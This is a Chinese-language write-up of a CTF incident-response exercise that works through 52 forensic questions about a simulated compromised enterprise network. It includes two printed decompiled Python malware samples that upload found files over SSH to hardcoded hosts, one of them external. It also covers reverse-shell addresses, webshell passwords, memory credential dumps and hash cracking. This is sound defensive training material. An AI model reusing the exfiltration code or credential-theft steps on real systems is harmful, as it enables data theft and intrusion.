1. 1. 一、背景信息
  2. 2. 二、网络拓扑
  3. 3. 三、资产清单
  4. 4. 应急响应题目
    1. 4.1. 1. 签到
    2. 4.2. 2.提交攻击者第一次登录时间
    3. 4.3. 3.提交攻击者源IP
    4. 4.4. 4.提交攻者使用的cve编号
    5. 4.5. 5.提交攻击者留着web服务器上的恶意程序的32位小写md5
    6. 4.6. 6.分析恶意程序连接地址和密码
    7. 4.7. 7. 提交存在反序列化漏洞的端口
    8. 4.8. 8. 提交攻击者使用的后门路由地址
    9. 4.9. 9. 提交dnslog反弹域名
    10. 4.10. 10. 提交第一次扫描器使用时间
    11. 4.11. 11.提交攻击者反弹shell使用的语言
    12. 4.12. 12. 提交攻击者反弹shell的ip
    13. 4.13. 13. 提交攻击者留下的账号
    14. 4.14. 14. 提交攻击者的后门账户密码
    15. 4.15. 15. 提交测试数据条数
    16. 4.16. 16. 请提交攻击者留下的信息
    17. 4.17. 17. 请提交运维服务器上的恶意文件md5小写32md5值
    18. 4.18. 18. 提交恶意文件的恶意函数
    19. 4.19. 19.请提交攻击者恶意注册的恶意用户条数
    20. 4.20. 20. 请提交对博客系统的第一次扫描时间
    21. 4.21. 21.提交攻击者下载的文件
    22. 4.22. 22.请提交攻击者第一次下载的时间
    23. 4.23. 23. 请提交攻击者留下的冰蝎马的文件名称
    24. 4.24. 24.提交冰蝎的链接密码
    25. 4.25. 25. 提交办公区存在的恶意用户名
    26. 4.26. 26.提交恶意用户密码到期时间
    27. 4.27. 27.请对办公区留存的镜像取证并指出内存疑似恶意进程
    28. 4.28. 28.请指出该员工使用的公司OA平台的密码
    29. 4.29. 29.攻击者传入一个木马文件并做了权限维持,请问木马文件名是什么
    30. 4.30. 30.请提交该计算机中记录的重要联系人的家庭住址
    31. 4.31. 31.请提交近源靶机上的恶意文件哈希
    32. 4.32. 32.提交恶意程序的外联地址
    33. 4.33. 33.提交攻击者使用内网扫描工具的哈希
    34. 4.34. 34.请提交攻击者在站点上留下的后门密码
    35. 4.35. 35.请提交攻击者在数据库留下的信息
    36. 4.36. 36.提交攻击者在监控服务器上留下的dcnlog地址
    37. 4.37. 37.提交监控服务器上恶意用户的上一次登录时间
    38. 4.38. 38.提交监控服务器上遗留的反弹shell地址和端口
    39. 4.39. 39.提交恶意钓鱼文件的哈希
    40. 4.40. 40.提交恶意文件外联IP(未解出)
    41. 4.41. 41.提交被恶意文件钓鱼使用者的姓名
    42. 4.42. 42.提交攻击者留下的信息
    43. 4.43. 43.提交恶意用户数量
    44. 4.44. 44.请提交员工集体使用的密码
    45. 4.45. 45.提交加密文件的哈希
    46. 4.46. 46.提交被攻击者加密的内容明文
    47. 4.47. 47.请提交符合基线标准的服务器数量
    48. 4.48. 48.提交办公区的恶意文件哈希
    49. 4.49. 49.提交恶意回连端口
    50. 4.50. 50.提交恶意程序中的flag
    51. 4.51. 51.提交恶意文件中的search_for_text内容
    52. 4.52. 52.提交web服务器上攻击者修改后的root密码

帕鲁杯应急响应wp

一、背景信息

​ 在这个跳跃的数字舞台上,数据安全成了政企单位稳航的重要压舱石。某政企单位,作为一艘驶向未来的巨轮,对数据的把控丝毫不敢松懈。眼下,我们即将启航一场无与伦比的探险——“信息安全探索之旅”。

​ 这趟旅程的目的是遍访我们的信息系统每一个角落,探寻隐藏在暗处的风险海怪,提升船员们对数据宝藏的守护意识,确保我们的珍贵资讯宝藏不被外界窥见,不受损害,随时准备发挥其价值。在这场航旅中,某政企单位期望锻造一副更加坚不可摧的数据防护铠甲,增强面对意外风暴的航行能力。

​ 你和你的团队,作为这次探险的领航员,将借助先进的应急响应罗盘,对我们的内部信息航道进行全域的安全梳理。从网络的海洋到系统的天空,从数据库的深渊到应用的岛屿,无一处不在你们的巡航范围之内。我们将特别防范那些潜伏的数据海盗——数据泄露、非法入侵、恶意攻击,以及物联网设备安全上的狂风骤雨。

​ 让我们携手共航,把这次“信息安全探索之旅”变成一个传奇,确保我们的信息系统像最强大的舰队领航者一样,勇敢、可靠、无所畏惧。向着更安全的港湾,全速前进!

二、网络拓扑

image-20240426221311597

三、资产清单

image-20240426221442628

wp参考了套神的blog和风二西师傅的视频教程

第一届 “帕鲁杯“ writeup_帕鲁杯第一名wp-CSDN博客
第一届 “帕鲁杯” CTF挑战赛_应急题目复现

应急响应题目

1. 签到

1
提交:[堡垒机的flag标签的值]

登陆 在标签列表中存在flag

image-20240426222622407

[BrYeaVj54009rDIZzu4O]

2.提交攻击者第一次登录时间

1
格式为:[2024/00/00/00:00:00]

JumpServer切换到审计台,日志审计-登陆日志 获取登陆成功信息
由于 登陆城市 LAN 与 其他 显示 局域网 不一致
可判断 这一条为攻击者第一次登录时间

image-20240426223806488

[2024/04/11/14:21:18]

3.提交攻击者源IP

1
格式为:[0.0.0.0]

由上题 可以往 192.168.1.4 和 192.168.20.123 靠
flag为[192.168.1.4]

4.提交攻者使用的cve编号

1
格式为:[CVE-0000-0000]

JumpServer的漏洞 [CVE-2024-29201]

5.提交攻击者留着web服务器上的恶意程序的32位小写md5

1
格式为:[xxxxxx]

image-20240427210301136

image-20240427210523638

回放会话 不敢相信 root目录下存在一个home程序

flag:[84413332e4e7138adc5d6f1f688ddd69]

6.分析恶意程序连接地址和密码

1
格式为:[md5(地址)-md5(密码)]全小写

可以 将vmdk放到DiskGenius里分析(跟套神wp看到的)
tips:将vmdk镜像拷贝一个副本进行分析
导文件这儿 卡了我好久 我纠结在 如何通过JumpServer运维机导出文件
也可以在DiskGenius进行导出(需要专业版)
卡在为什么会有思路去解包(来自逆向小白的疑问)
也是第一次学将程序(linux程序)解包成pyc
之前好像有Windows程序解包的经历(忘了是在哪个比赛了)
每次拿到可执行程序 我第一个想法是放到情报平台里看
因为 有些平台中网络连接地址 会直接显示出来

image-20240430114007240
解包工具
extremecoders-re/pyinstxtractor: PyInstaller Extractor (github.com)
home是一个python程序 需要进行解包
成功解出pyc文件
image-20240430114211076

pyc文件进行反编译 可以使用(uncompyle6)

uncompyle6模块会因为版本不对应的问题而失败

image-20240430114717204
使用在线平台
python反编译 - 在线工具 (tool.lu)
成功进行了将pyc文件反编译成py文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.10

import os
import paramiko
from getpass import getpass

def search_in_files(directory, search_text):
pass
# WARNING: Decompyle incomplete


def ssh(local_file_path, remote_file_path):
hostname = '82.157.238.111'
port = 22
username = 'root'
password = '1qaz@WSX3edc'
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, port, username, password)
sftp = client.open_sftp()
sftp.put(local_file_path, remote_file_path)
sftp.close()
client.close()
print(f'''File {local_file_path} uploaded to {remote_file_path} on {hostname}''')

search_directory = '/'
search_for_text = 'passwod'
(a, b) = search_in_files(search_directory, search_for_text)
ssh(a, b)

根据源代码

flag:[md5(82.157.238.111)-md5(1qaz@WSX3edc)]

7. 提交存在反序列化漏洞的端口

1
格式为:[md5(端口)]

通过waf翻日志 过滤攻击类型 发现漏洞
image-20240428224515896
flag:[md5(8080)]

8. 提交攻击者使用的后门路由地址

1
格式为:[md5(/api/xxx)]

在jumpServer发现命令 cat app.py
image-20240428225329516不是一般人 还真不会这么翻、、、

flag:[md5(/api/system)]

9. 提交dnslog反弹域名

1
格式为:[md5(域名)]

当时自己的做法(通过已知后门再传个后门)
由于网站根目录有个GET木马 然后 再上传一个POST木马 蚁剑连接
在翻到了flask目录下翻到了日志
image
emm 上面 有0vqkht.dnslog.cn 被迷惑了好久 最后 翻到了

flag:[md5(0vqkht.palu.cn)]

10. 提交第一次扫描器使用时间

1
格式为:[2024/00/00/00:00:00]

这题 我一直拿目录扫描 作为第一次扫描器使用时间
这里看了套神的wp
image-20240430144850390
他的判断依据是 间隔时间非常短 尝试时间戳转时间提交试了一下
image-20240430145544467

flag:[2024/04/15/02:26:59]

11.提交攻击者反弹shell使用的语言

1
格式为:[md5(c++&java)]均为小写

image-20240430151423497可以知道是python进行的一个反弹shell

flag:[md5(python)]

12. 提交攻击者反弹shell的ip

1
格式为:[xxx.xxx.xxx.xxx]

image-20240430154141567
将base64进行解码得到反弹shell的ip和端口

flag:[82.157.238.174]

13. 提交攻击者留下的账号

1
格式为:[xxxxx]

查看/etc/passwd
image-20240430155621849

flag:[palu.com]

14. 提交攻击者的后门账户密码

1
格式为:[md5(password)]

查看 /etc/shadow 可以根据hash爆破出密码
比赛的时候没有权限 也没想着去提权之类的
套神使用的 DiskGenius 直接从镜像内存中提取出来 绝了
image-20240430160133849
提取出攻击者的后门账户hash值
image-20240430160422858

flag:[md5(123123)]

15. 提交测试数据条数

1
格式为[md5(xxx)]

连接数据库MYSQL Server 1 查看palu_ctf库中user表
image-20240430161937320

flag:[md5(5)]

16. 请提交攻击者留下的信息

1
格式为:[xxxx]

在/var/log/nginx/下存在 hacktext
image-20240430212748204

flag:[flag{hi_palu_f10g}]

17. 请提交运维服务器上的恶意文件md5小写32md5值

1
格式为:[xxxx]

image-20240430220833470
与第五题类似

flag:[0fca0f847a45401c878d7a5303ddc1f8]

18. 提交恶意文件的恶意函数

1
格式为:[md5(恶意函数)]

想要得到恶意文件 helloword
使用DiskGenius 没有出现lib目录 没有整出恶意文件
尝试ssh连接 也禁止远程连接 使用python起一个网页服务
然后 将文件进行下载
image-20240430222655520
image-20240430223007006

师傅们认为haveadoor为恶意函数 flag却是begingame

flag:[md5(begingame)]

19.请提交攻击者恶意注册的恶意用户条数

1
格式为:[md5(x)]

image-20240430224502750
恶意注册的恶意用户条数为10条

flag:[md5(10)]

20. 请提交对博客系统的第一次扫描时间

1
格式为:[2024/00/00/00:00:00]

image-20240430230207088

大量发送数据探测

flag:[2024/04/16/21:03:46]

21.提交攻击者下载的文件

1
格式为[xxxx.xxx]

waf查看资源总数
image-20240430225404075

flag:[upload.zip]

22.请提交攻击者第一次下载的时间

1
格式为:[xx/Apr/2024:xx:xx:xx]

根据上题 已经知道攻击者下载的文件 继续分析 查看日志
image-20240506090926975
image-20240506091256813

flag:[16/Apr/2024:09:03:52]

23. 请提交攻击者留下的冰蝎马的文件名称

格式为:[xxxx]
查看命令记录

image-20240506091838766

对照命令翻文件判断

flag:[nidewen.php]

24.提交冰蝎的链接密码

1
格式为:[xxx]

image-20240506092110190
key为md5前十六位 首先cmd5解密 发现付费
也可以使用字典碰撞
(在github搜代码)

image-20240506092415578

flag:[nidewen]

25. 提交办公区存在的恶意用户名

1
格式为:[xxx]

查看 PC1 电脑 (net user)
有时候 创建用户 net user并不可以看到
需要查看用户组
image-20240506092819584

flag:[hacker]

26.提交恶意用户密码到期时间

1
格式为:[xxxx]

image-20240506093012110

flag:[2024/5/28/21:40:37]

27.请对办公区留存的镜像取证并指出内存疑似恶意进程

1
格式为:[xxxx]

内存文件
volatility启动
查看镜像

1
volatility -f raw.raw imageinfo 

image-20240506094459177
查看进程

1
volatility -f raw.raw --profile=Win7SP1x64 pslist

image-20240506094558677

flag:[.hack.ex]

28.请指出该员工使用的公司OA平台的密码

1
格式为:[xxxx]

image-20240506095835155
根据题目filescan 筛选pass
dumpfiles提取出文件

1
volatility -f raw.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e296f20 -D ./

image-20240506100545349

1
2
3
url: http://test.oa.com/login.html
username: liuling
password: liuling7541

flag:[liuling7541]

29.攻击者传入一个木马文件并做了权限维持,请问木马文件名是什么

1
格式为:[xxxx]

查看基本信息的时候 发现剪贴板中有文件

1
volatility -f raw.raw --profile=Win7SP1x64 clipboard

image-20240506101233674

flag:[h4ck3d!]

30.请提交该计算机中记录的重要联系人的家庭住址

1
格式为:[xxxxx]

拿到该题 一般 方便 我们会把敏感信息放桌面
可以先filescan桌面
image-20240506101933007
发现没有什么有用信息 可以搜用户栏或者指定用户image-20240506102023466
有 Contacts文件夹 我们可以进一步过滤
image-20240506102210602

dumpfiles 数据
image-20240506102443262

flag:[秋水省雁荡市碧波区千屿山庄1号]

31.请提交近源靶机上的恶意文件哈希

1
格式为:[xxx]

打开PC2 并会自动打开开始菜单的一个文件夹,猜测为恶意文件
使用系统自带的命令计算hash(certutil.exe)
image-20240506104644947

flag:[a7fcd0b15a080167c4c2f05063802a6e]

32.提交恶意程序的外联地址

1
格式为:[xxxxx]

image-20240506105954533

flag:[101.78.63.44]

33.提交攻击者使用内网扫描工具的哈希

1
格式为:[xxxx]

image-20240506120043949

在命令记录中看到fscan
image-20240506120325772

flag:[1facdcd05c43ba4d37274dffc90b6d4e]

34.请提交攻击者在站点上留下的后门密码

1
格式为:[md5(xxxx)]

image-20240506121336697

flag:[md5(123)]

35.请提交攻击者在数据库留下的信息

1
格式为:[xxxx]

image-20240506135806330

flag:[flag{hack_palu}]

36.提交攻击者在监控服务器上留下的dcnlog地址

1
格式为:[xxx.xx.xx]

MYSQL Server 2 中 zabbix库中 scripts表中发现 dcnlog地址
image-20240506163649459

flag:[palu.dcnlog.cn]

37.提交监控服务器上恶意用户的上一次登录时间

1
格式为:[xx/xx/xx/xx:xx:xx]

登陆 zabbix 服务器 服务登录信息未知 可以使用默认密码 Admin/zabbix
也可以在 MYSQL Server 2 中搜密码
image-20240506164200702

image-20240506164421387

image-20240506164753810

flag:[2024/04/17/01:32:44]

38.提交监控服务器上遗留的反弹shell地址和端口

1
格式为:[xxxx:xx]

image-20240506165358799
base64解码
image-20240506165442862

flag:[154.183.110.12:7890]

39.提交恶意钓鱼文件的哈希

1
格式为:[xxxx]

image-20240506205000624

提交发现提交成功

flag:[da75025ff7f3b6baa27f5913c1c83063]

查看其会话记录也可以看到 恶意文件的哈希
image-20240506211058615

image-20240506211251938

40.提交恶意文件外联IP(未解出)

1
格式为:[xxx]

该题 我放到在线沙箱平台 微步
image-20240506214801765

检测全绿 网络连接是有一个 120.92.102.194 提交 flag 错误
https://www.virustotal.com/中有五个IP 但是提交都错误
image-20240506215039009
有一种大胆的想法
可能是域名解析出来的IP 钓鱼。。。
paluctf平台整了CDN

image-20240506220143557

flag:[未知]

41.提交被恶意文件钓鱼使用者的姓名

1
格式为:[xxx]

image-20240506204444682

在此用户文件夹下发现恶意钓鱼文件

flag:[陈琚鹭]

42.提交攻击者留下的信息

1
格式为:[xxxx]

继续查看会话记录 发现在注册表中添加了字符串
image-20240506220818730

flag:[flag{2024-04-17-hi}]

43.提交恶意用户数量

1
格式为:[md5(xxxx)]

除去中文字符 (员工姓名) 系统自带用户
admin+编号/dev+编号/sale+编号 为恶意用户
image-20240506222244295

flag:[md5(49)]

44.请提交员工集体使用的密码

1
格式为:[xxxx]

image-20240506221813103

flag:[Network@2020]

45.提交加密文件的哈希

1
格式为:[xxxx]

image-20240506223134802

找到加密文件 算出加密文件的哈希值 方法与31题类似

image-20240506223434442

flag:[2bf71a0d6d4e70cec7602da2b653e2ab]

46.提交被攻击者加密的内容明文

1
格式为:[xxxx]

image-20240506223527665

加密文本

1
玛巴轰达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰玛巴轰玛巴玛巴玛巴轰达姆阿卡嗙轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰伊卡阿卡噢伊卡阿卡噢轰玛卡巴卡轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰咿呀呦咿呀呦咿呀呦轰阿巴雅卡阿巴雅卡阿巴雅卡阿巴雅卡轰伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰哈姆达姆阿卡嗙轰

加解密参考
Drt免杀生成器 Drt AAV | Bypass AV | 杀软绕过 - 🔰雨苁ℒ🔰 (ddosi.org)
这里贴上 Wbuildings师傅的解密代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
values = ['玛卡巴卡轰', '阿巴雅卡轰', '伊卡阿卡噢轰', '哈姆达姆阿卡嗙轰', '咿呀呦轰', '玛卡雅卡轰', '伊卡阿卡轰', '咿呀巴卡轰', '达姆阿卡嗙轰', '玛卡巴卡玛卡巴卡轰', '玛卡巴卡玛卡巴卡玛卡巴卡轰', '玛卡巴卡玛卡巴卡玛卡巴卡玛卡巴卡轰', '阿巴雅卡阿巴雅卡轰', '阿巴雅卡阿巴雅卡阿巴雅卡轰', '阿巴雅卡阿巴雅卡阿巴雅卡阿巴雅卡轰', '伊卡阿卡噢伊卡阿卡噢轰', '伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰', '伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰', '哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰', '哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰', '哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰', '咿呀呦咿呀呦轰', '咿呀呦咿呀呦咿呀呦轰', '咿呀呦咿呀呦咿呀呦咿呀呦轰', '咿呀呦咿呀呦咿呀呦咿呀呦咿呀呦轰', '玛卡雅卡玛卡雅卡轰', '玛卡雅卡玛卡雅卡玛卡雅卡轰', '玛卡雅卡玛卡雅卡玛卡雅卡玛卡雅卡轰', '伊卡阿卡伊卡阿卡轰', '伊卡阿卡伊卡阿卡伊卡阿卡轰', '伊卡阿卡伊卡阿卡伊卡阿卡伊卡阿卡轰', '咿呀巴卡咿呀巴卡轰', '咿呀巴卡咿呀巴卡咿呀巴卡轰', '咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡轰', '咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡轰', '达姆阿卡嗙达姆阿卡嗙轰', '达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰', '达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰', '达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰', '巴卡巴卡轰', '巴卡巴卡巴卡巴卡轰', '巴卡巴卡巴卡巴卡巴卡巴卡轰', '巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡轰', '巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡轰', '呀呦轰', '呀呦呀呦轰', '呀呦呀呦呀呦轰', '呀呦呀呦呀呦呀呦轰', '呀呦呀呦呀呦呀呦呀呦轰', '达姆阿卡轰', '达姆阿卡达姆阿卡轰', '达姆阿卡达姆阿卡达姆阿卡轰', '达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰', '达姆阿卡达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰', '玛巴轰', '玛巴玛巴轰', '玛巴玛巴玛巴轰', '玛巴玛巴玛巴玛巴轰', '巴卡玛巴轰', '巴卡玛巴巴卡玛巴轰', '巴卡玛巴巴卡玛巴巴卡玛巴轰', '巴卡玛巴巴卡玛巴巴卡玛巴巴卡玛巴轰', '妈个巴子轰', '妈个巴卡轰', '妈个巴达轰']
keys = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '=', '/', '+']

c = '玛卡巴卡玛卡巴卡轰达姆阿卡嗙轰阿巴雅卡阿巴雅卡阿巴雅卡轰达姆阿卡嗙轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰玛卡巴卡轰达姆阿卡嗙轰阿巴雅卡阿巴雅卡轰咿呀呦轰达姆阿卡嗙轰'

c_list = []
for i in c.split('轰'):
c_list.append(i+'轰')

m = ''
for i in c_list[:-1]:
if i in values:
index = values.index(i)
m+=keys[index]
print(m)

c = '玛巴轰达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰玛巴轰玛巴玛巴玛巴轰达姆阿卡嗙轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰伊卡阿卡噢伊卡阿卡噢轰玛卡巴卡轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰咿呀呦咿呀呦咿呀呦轰阿巴雅卡阿巴雅卡阿巴雅卡阿巴雅卡轰伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰哈姆达姆阿卡嗙轰'

c_list = []
for i in c.split('轰'):
c_list.append(i+'轰')

m = ''
for i in c_list[:-1]:
if i in values:
index = values.index(i)
m+=keys[index]
print(m)

# flag{jinitaimei} 密码学 玛卡巴卡有什么坏心思
# 2024ispassword 该题flag

flag:[2024ispassword]

47.请提交符合基线标准的服务器数量

1
格式为:[md5(xx)]

image-20240506224943124

一共就6台

flag:[md5(0)]

48.提交办公区的恶意文件哈希

1
格式为:[xxx]

通过文件传输 发现存在 palucomeyi1.exe
image-20240506225243357

在PC2定位得到 palucomeyi1.exe所在文件夹
image-20240506225605737

根据前面方法类似 得到 该恶意文件的哈希
image-20240506225724720

flag:[5232a191eb2913337e0a93b0a990f2a2]

49.提交恶意回连端口

1
格式为:[xxx]

由于是一个python封装的exe文件
与第六题类似 将其进行解包得到pyc文件
image-20240507001507626
成功转成pyc文件
将pyc 使用线上平台反编译成py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.8

import os
import paramiko
from getpass import getpass

def search_in_files(directory, search_text):
pass
# WARNING: Decompyle incomplete


def ssh(local_file_path, remote_file_path):
hostname = '192.168.20.123'
port = 22
username = 'root'
password = 'Network@2020'
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, port, username, password)
sftp = client.open_sftp()
sftp.put(local_file_path, remote_file_path)
sftp.close()
client.close()
print(f'''File {local_file_path} uploaded to {remote_file_path} on {hostname}''')
flag = 'flag{234567uyhgn_aiduyai}'

search_directory = '/'
search_for_text = 'passwod'
(a, b) = search_in_files(search_directory, search_for_text)
ssh(a, b)

flag:[22]

50.提交恶意程序中的flag

1
格式为:[xxx]

根据上题代码可知

flag:flag{234567uyhgn_aiduyai}

51.提交恶意文件中的search_for_text内容

1
格式为:[xxx]

根据上上题代码可知

flag:[passwod]

52.提交web服务器上攻击者修改后的root密码

1
格式为:[xxxx]

思路是参考14题
导出shadow文件 进行john哈希爆破 由于字典中没有这个密码 没跑出来
image-20240506224540576
image-20240506224609225

flag:[Network@20202020]